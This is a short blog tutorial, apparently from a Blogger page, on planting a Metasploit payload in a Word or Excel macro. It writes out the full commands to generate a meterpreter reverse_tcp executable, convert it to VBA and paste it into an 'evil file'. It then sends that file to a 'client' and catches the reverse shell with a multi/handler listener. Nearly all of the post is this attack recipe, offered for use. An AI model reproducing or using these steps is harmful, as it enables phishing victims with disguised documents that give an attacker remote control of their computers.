Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
prepare your metaesploit and backtrack
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and Paste the contents of the payload to your evil file
Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 4: Send the evil file to your client
Step 5: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.20
msf > set LPORT 443
msf > exploit
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar